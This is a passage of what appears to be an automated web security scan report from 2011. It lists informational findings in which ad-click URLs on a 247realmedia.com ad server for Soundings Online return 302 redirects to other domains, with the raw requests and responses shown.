<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

20.111. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.112. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.113. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.114. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.115. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.116. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.117. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.118. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.119. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.120. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:55:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.121. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.122. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.123. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.124. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

